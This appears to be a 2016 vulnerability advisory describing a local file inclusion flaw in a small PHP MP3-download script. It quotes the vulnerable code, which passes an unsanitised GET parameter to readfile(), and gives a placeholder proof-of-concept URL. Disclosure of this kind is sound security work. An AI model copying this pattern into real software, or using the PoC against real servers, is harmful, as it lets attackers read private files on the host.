Load MP3 Form - Local File Inclusion

2016.09.08

Credit: Shahab Shamsi

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

[-] Title : Load MP3 Form - Local File Inclusion
[-] Author : Shahab Shamsi
[-] Vendor : https://github.com/daveismyname/Load-MP3-s-from-a-folder
[-] Category : Webapps
[-] Date : 06.September.2016
Vulnerable page :
/Load-MP3-s-from-a-folder/index.php
Vulnerable Source :
$file = $dirname.$_GET['download'];
header ("Content-type: octet/stream");
header ("Content-disposition: attachment; filename=".$file.";");
header("Content-Length: ".filesize($file));
readfile($file);
exit;
POC :
http://localhost/pach/Load-MP3-s-from-a-folder/index.php?download=[LFI]
************************
* ==> Contact Me :
* Telegram : @R4DIK4L
* Email : info@securityman.org
* WebSilte : WwW.MohitAmn.Org
* Tnx : AmirHossein Farjad
************************

References:

https://github.com/daveismyname/Load-MP3-s-from-a-folder

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Load MP3 Form - Local File Inclusion

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.